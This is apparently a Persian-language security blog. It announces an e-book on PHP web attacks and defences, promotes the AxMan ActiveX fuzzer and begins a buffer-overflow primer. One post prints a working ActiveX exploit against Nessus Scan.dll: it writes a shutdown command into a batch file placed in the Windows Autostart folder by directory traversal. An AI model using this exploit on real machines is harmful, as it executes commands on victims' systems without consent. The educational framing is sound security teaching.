جستارهایی در وادی امنیت
DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit
http://www.milw0rm.com/exploits/6878
(PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray
http://www.milw0rm.com/exploits/6840
درود
از تابستان بود که به فکر نوشتن این کتاب افتادم.اوایل مهر ۱۳۸۶ بود که نوشتن را آغاز کردم.تقریبا خسته کننده بود ، اما من نوشتم.ابتدا قصد داشتم کتاب را پس از کامل شدن ، برای چاپ آماده کرده و به چاپ برسانم.اما بعد از مدتی پشیمان شده و تصمیم به انتشار کتاب به صورت الکترونیکی شدم.کتاب زیر که اولین ویرایش از کتاب است ، حدود ۳ ماه وقت برده است.کتاب تقریبا ۱۵۰ صفحه است.کتاب کامل نیست و حدودا همین مقدار ( ۱۵۰ صفحه یا بیشتر ) از مطالب آن باقی مانده است.از آنجا که به نظر بده نگارش کتاب به قسمت قابل توجهی رسید تصمیم گرفتم نسخه ۰/۸ آن را به علاقه مندان عرضه کنم.دوستان ، صاحب نظران و کسانی که به نوعی با این زبان آشنایی دارند ، اگر کتاب را مطالعه فرمودند و اشکالی در آن یافتند به اطلاع بنده برسانند ، تا در نسخ آتی بر طرف شود(حتما مشکلاتی را مشاهده خواهید کرد زیرا وضعیت بنده ، اشکالات تایپی و نبود فرصت برای تست برخی اسکریپتها مشکل آفرین هستند ). شکل کتاب ، سر فصل ها ، ویرایش املا و مواردی از این قبیل تا نسخه انتهایی ( شاید ۲ و یا ۳ ) به همین صورت خواهد بود.پس از آن تصمیم به انتخاب یک قالب مناسب ( همراه با فهرست ، منابع ، کلمات انگلیسی و … ) میگیرم.
از دوستان عزیزی که این مطلب را میخوانند خواهش دارم برای رسیدن این کتاب به دست علاقه مندان، توضیح زیر را به همراه لینک بارگزاری کتاب در وبلاگ ، وبسایت و … معرفی کرده ، بر بنده منت گذاشته و بنده را به هدف خود ( آگاهی و بالا رفتن سطح علمی ) نزدیک تر کنند.پیشاپیش از تمام کسانی که این کار را انجام میدهند ، کمال قدر دانی را دارم.
با تشکر ، برادر کوچکتر شما ، شهریار جلایری .
—— شروع توضیحات ——
نام کتاب : حمله و دفاع در برنامه های کاربردی وب مبتنی بر زبان ( نسخه ۰/۸ )
با توجه به افزایش برنامه های کاربردی وب که مبتنی بر زبان PHP و دیتابیس Mysql ، برآن شدم تا کتابی تحت عنوان ” شرح حملات و نحوه دفاع در مقابل حملات” را برای برنامه نویسان این زبان قدرتمند عرضه کنم.عقیده شخصی بنده بر این اساس استوار است که یک وب مستر ، برنامه نویس ، طراح سایت و… برای جلوگیری از نفوذ باید با راه های نفوذ آشنایی نسبی داشته باشد. هیچ یک از نفوذ گر ها و هکر ها مثل هم فکر نمیکنند ، اما یک برنامه نویس با داشتن ذهن باز و آشنا با حملاتی که برنامه وی را تهدید میکنند ، میتواند برنامه ای امن تر بنویسد و با داشتن تفکر یک نفوذ گر میتواند قبل از تهدید و نهایتا نفوذ توسط یک هکر ،خود مانند یک نفوذ گر عمل کرده و نقاط ضعف و قوت را شناخته ، در صدد تقویت و رفع آنها برآید.
در این کتاب همانطور که در عنوان مشهود است ، قصد دارم راه های نفوذ و دفاع را در برنامه های وب مبتنی بر زبان PHP به شما بیاموزم.ابتدا شما را با مفاهیم پایه ای آشنا کرده و سپس توابع و دستورات خطر آفرین را معرفی و نحوه نفوذ و دفاع هر یک را شرح میدهم. در آخر نیز تعدادی از ابزارهای خود کار را که میتوانند نقش مهمی را در رسیدن به هدفتان ( که برنامه ای امن است ) بازی کنند و هر چه سریعتر باعث تحقق این هدف شوند.
نکته ۱ : در این کتاب هیچ گونه آموزشی در باره زبان برنامه نویسی PHP صورت نمیگیرد و خواننده باید آشنایی نسبی با برنامه نویسی این زبان را داشته باشد.
نکته ۲: تمامی روش ها ، اسکریپت ها و برنامه های معرفی شده در این کتاب ، صرفا جنبه آموزشی داشته و نویسنده و وبسایت های ارائه دهنده کتاب ، مسئولیت هیچ یک از اعمال خرابکارانه صورت گرفته توسط خوانندگان این کتاب را بر عهده نمیگیرد/نخواهد گرفت.
نکته ۳: هر گونه چاپ ، تهیه جزوه و تکثیر این کتاب ممنوع میباشد.تمامی حقوق برای نویسنده ، تیم تحقیقاتی امنیتی ناشناخته و وبلاگ امنیت PHP محفوظ میباشد و هرگونه کپی برداری از مطالب در وب ، با ذکر منبع بلا مانع میباشد.
نگارنده : شهریار جلایری
لازم به ذکر است ، در تمامی فصول مربوط به حملات، روش های حمله ، برنامه نویسی اشتباه و روش جلوگیری از حملات درج شده است ، اما از آوردن آن سر فصل ها در فهرست زیر خودداری کردم.
مطالب این نسخه :
فصل اول : مقدمه
مقدمه
اکسپلویت
فصل دوم : کوکی، نشت، متغییر ها
نیازمودن متغییر ها
نشست ها
کوکی ها
فصل سوم : حملات پیمایش دایرکتوری ها
پیمایش دایرکتوری ها
فصل چهارم : حملات فراخوانی فایلها
فراخوانی فایل ها از راه دور
فصل پنجم : حملات اجرای فرامین
اجرای فرامین
فصل ششم : حملات تزریق کد به فایل های لاگ سیستمی
حملات تزریق کد PHP به فایل های لاگ سیستمی
فصل هفتم : حملات XSS
حملات XSS
انواع حملات XSS
کدهای کاربردی
حمله از طریق Flash
فصل هشتم : حملات ورود به زور
تشریح حملات
حملات دیکشنری
معرفی ابزار
فصل نهم : حملات تزریق کدهای SQL
تشریح حملات
مقدمه ای بر زبان SQL
تشریح آسیب پذیری
تشریح چند برنامه آسیب پذیر
روش ایمن سازی
فصل دهم : شلر ها
شلر ها چه هستند؟
بررسی جزء به جزء
فصل یازدهم : کدهای مخرب
مقدمه
نوشتن کدهای مخرب
PHP و خط فرمان
سوکت نویسی
بررسی و نوشتن انواع کدهای مخرب
فصل دوازدهم : ویروس های مبتنی بر PHP
تشریح مبحث
روش های آلوده سازی و …
این فصل کامل نیست و در ویرایش های آینده کامل خواهد شد.
—– پایان توضیحات ——
درود بر شما!
نکته : با تشکر از آقای حسام-ایکس که این مقاله رو در سیمرغ معرفی کردند!
در زمن به حال مکن دعا کنید + نظر !!!
بارگزاری
عنوان اصلی : AxMan:web-based ActiveX fuzzing engine
درود
شما به اون dll انجکشن که براتون فیلمشو گذلشتم اهمیت که ندادین! عمرا جایی بتونید عین اونو یا اصلا آموزش در اون مورد پیدا کنید!
خب بریم سر کار خودمون.
[SUMMARY]
Axman یک موتور تحت وب برای فاز کردن ActiveX است.هدف Axman پیدا کردن آسیب پذیری در آبجک های COM است ، البته اونایی که از طریق IE اجرا میشن. در ضمن چون Axman بر تحت وب نشوشته شده ، با تغییرات امنیتی جزئی در هر مرورگر وبی میتونید نتیجه کار اونو ببینید.
نکته: Axman ساخته شده برای IE 6 هستش!!!
[DOWNLOAD]
میتونید آخرین ورژن یعنی ۱/۰/۰ رو دانلود کنید!
[DEMO]
یک دموی آنلاین هم از برنامه هست.البته اجرا کردن Axman بر روی سرور لوکال سرعت بیشتری داره
[CONTACT]
این برنامه نوشته شده H D More هست که :
hdm@metasploit.com
http://axfuzz.sf.net/
http://metasploit.com/users/hdm/tools/axman/
اطلاعات تکمیلی دیگه هم با دانلود Axman بخونید!
منابع : سازمان آب ،برق ، گاز وتلفن + همینجا + متااسپلویت
نکته:
کپی نه رایت : از این به بعد هر کس ، هر چغندری ، یا هر شفتالویی ، خواست از مطالب و عکس های اینجا < Unkn0wn > را به اسم خودش !!! در وبلاگ یا هر مستراحی کپی و پیست کد آزاد است و نیازی به گرفتن حلالیت ندارد ، باشد که رستگار و موفق شود !!
کپی رایت ، کپی نه رایت وبلاگ استاد بزرگ : کف خون بینگالو
درود
گفتم شاید واستون جالب باشه!
Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Code Execution
در یک dll به نام Scan.dll آسیب پذیری مشاهده میشه!
Classid:A47D5315-321D-4DEE-9DB3-18438023193B
و در تابع addsetConfig میبینیم:
Function addsetConfig (
ByVal nessus_name As String ,
ByVal value As String ,
ByVal group As String
) As Integer
و همچنین در تابع saveNessusRC میبینیم:
Function saveNessusRC (
ByVal fullname As String
) As Integer
و حالا :
<-HTML>
<-object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B">
<-script language="javascript">
obj.addsetConfig(’shutdown -t 1000 -s -c “hello world ;]” && pause’, ”, ”);
obj.saveNessusRC(”../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat”);
<-/script>
<-/HTML>
منبع اکسپلویت میلورم بود ! …
نظرات شما باعث شادی روح آن مرحوم و تسلی خاطر بازماندگان است.
درود بر ایرانیان نیک سرشت!
به یاد گذشته و زمانی که خودم هنوز با این مسائل آشنا نشده بودم ، مطلبی برای دوستانی که تازه با این مهم (سریز در بافر،پشته،هیپ) آشنا شده اند ،میگزارم.
در ضمن به شما توصیه میکنم [ezin]Perl Underground 4 را حتما مورد مطالعه قرار دهید!
بسی مایه خنده ما شد! مخصوصا قسمت DeltaHacking آن….
نکته : این مطالب ادامه دارد…
—————————————————-
حافظه رویداد ها[۱] از قسمت هایی تشکیل شده است که با هم آنها را مرور میکنیم.
قطعه کد[۲] :داده هایی که در این قسمت ، دستوراتی هستند که برای اسمبلر قابل فهم و اجرا هستند. کد های اجرا شده غیر خطی هستند ( رویه خاص و ثابتی را دنبال نیمکنند). آنها میتوانند کد ها را رد کنند ، پرش کنند و یا تابعی را صدا بزنند.از این رو ما اشاره گری به نام EIP یا اشاره گر دستورات داریم.این اشاره گر همیشه به کدی اشاره میکند که در عمل بعدی ، قرار است اجرا شود.
قطعه داده ها [۳] : فضایی برای متغییر ها و بافر های پویا و یا ایستا( در مورد این نوع بافر ها در مقالات قبلی اشاره های شده است) .
قطعه پشته [۴] : این قطعه برای فرستادن داده ها (آرماگون ها) به توابع و نگه داری متغییر های توابع استفاده میشود. و همانطور که میدانید ساختاری متفاوت با دیگر قسمت های حافظه دارید( توضیح داده شده است).
و باز هم همانطور که میدانید دستور PUSH یک عنصر را به بالای پشته اضافه کرده و توسط دستورPOP آخرین عنصر ورودی را از پشته خارج میکند( البته نه کاملا) و آن را در یکی از ثبات قرار میدهد.
۱-Processes Memory
2-Code Segment
3-Data Segment
4-Stack Segment
درود
در این درس کلیپ شما م
یبینید ، خودتون ببینید!
————–
در مورد مقاله باید بگم با این که تمو شد اما فکر میکونم هنوز زوده!
آخه خیلی سنگین بود…
در ضمن اگه سوالی بود ،واگه جوابشو بلد بودم در خدمتم!
بارگزاری کلیپ
درود!
حوصله ندارم توضیح بدم! اول لوکال رو ببینید و بعد ریموت… بای بای
درود
اگر مقاله قبلی را نخواندید ، انیم نخونید !!! چون به هم ربط دارن!!!
درود
بفرمایید.مقله ای که در آن پشته زیر ورو شده است !
بارگزاری
مقاله با توضیح هم اینجا!
—————————————————
در مورد سوال آن دوست عزیز ColdFire من جوابتون را دادم
اینجا!
اگه بازم سوالی بود تونظرات بگو!!
